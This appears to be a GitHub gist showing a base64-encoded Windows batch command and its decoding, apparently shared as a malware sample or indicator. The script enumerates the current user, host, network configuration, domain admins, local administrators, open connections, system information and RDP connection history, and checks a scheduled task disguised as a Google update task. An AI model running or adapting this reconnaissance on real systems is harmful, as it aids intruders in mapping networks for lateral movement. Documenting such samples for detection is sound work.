| QGVjaG8gb2ZmJmNoY3AgNjUwMDEmIHdob2FtaSAyPiYxICYgaG9zdG5hbWUgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19JcENvbmZpZ19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIGlwY29uZmlnIC9hbGwgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19Eb21pYW4gQWRtaW5zX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIG5ldCBncm91cCAiZG9tYWluIGFkbWlucyIgL2RvbWFpbiAyPiYxICYgZWNobyBfX19fX19fX19fX19fX19fX19fX19fX25ldCBsb2NhbCBncm91cCBtZW1iZXJzX19fX19fX19fX19fX19fX19fX19fX19fICYgbmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19uZXRzdGF0X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIG5ldHN0YXQgLWFuIDI+JjEgJiBlY2hvIF9fX19fX19fX19fX19fX19fX19fX19fX19fX19fc3lzdGVtaW5mb19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18gJiBzeXN0ZW1pbmZvIDI+JjEgJiBlY2hvIF9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fUkRQX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18gJiByZWcgcXVlcnkgIkhLRVlfQ1VSUkVOVF9VU0VSXFNvZnR3YXJlXE1pY3Jvc29mdFxUZXJtaW5hbCBTZXJ2ZXIgQ2xpZW50XERlZmF1bHQiIDI+JjEgJiBlY2hvIF9fX19fX19fX19fX19fX19fX19fX19fX19fX19DdXN0b20gQ29tbWFuZF9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18gJiB3bWljIG9zIGdldCBDYXB0aW9uIC92YWx1ZSB8IG1vcmUgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19UYXNrX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIHNjaHRhc2tzIC9xdWVyeSAvRk8gTGlzdCAvVE4gIkdvb2dsZVVwZGF0ZVRhc2tzTWFjaGluZVVJIiAvViB8IGZpbmRzdHIgL2IgL24gL2M6IlJlcGVhdDogRXZlcnk6IiAyPiYxICYgZWNobyBfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fIA== | |
| decodes to: | |
| @echo off&chcp 65001& whoami 2>&1 & hostname 2>&1 & echo ________________________________IpConfig______________________________ & ipconfig /all 2>&1 & echo __________________________Domian Admins_______________________________ & net group "domain admins" /domain 2>&1 & echo _______________________net local group members________________________ & net localgroup administrators 2>&1 & echo ________________________________netstat_______________________________ & netstat -an 2>&1 & echo _____________________________systeminfo_______________________________ & systeminfo 2>&1 & echo ________________________________RDP___________________________________ & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1 & echo ____________________________Custom Command_______________________________ & wmic os get Caption /value | more 2>&1 & echo ________________________________Task__________________________________ & schtasks /query /FO List /TN "GoogleUpdateTasksMachineUI" /V | findstr /b /n /c:"Repeat: Every:" 2>&1 & echo ______________________________________________________________________ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment